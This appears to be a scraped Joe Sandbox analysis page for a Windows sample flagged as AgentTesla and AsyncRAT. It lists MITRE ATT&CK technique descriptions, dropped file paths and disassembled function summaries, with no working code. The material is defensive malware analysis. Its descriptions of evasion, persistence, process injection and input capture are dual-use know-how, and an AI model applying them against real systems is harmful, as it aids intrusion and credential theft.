Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PCMNil7wkU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Akaelkov.url

C:\Users\Public\Libraries\Akaelkov.PIF

C:\Users\Public\Libraries\AkaelkovO.bat

C:\Users\Public\Libraries\KDECO.bat

C:\Users\Public\Libraries\Null

C:\Users\Public\Libraries\easinvoker.exe

C:\Users\Public\Libraries\netutils.dll

C:\Users\Public\Libraries\truesight.sys

C:\Users\Public\Libraries\vokleakA.pif

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
PCMNil7wkU.exe

Function 04127E4C Relevance: 43.5, APIs: 8, Strings: 16, Instructions: 1478
nativethreadprocessCOMMON

Function 04105DDC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 0411FD38 Relevance: 12.1, APIs: 8, Instructions: 65
librarynativeloaderCOMMON

Function 0411FCD8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Function 0411FB7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Function 0411FB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre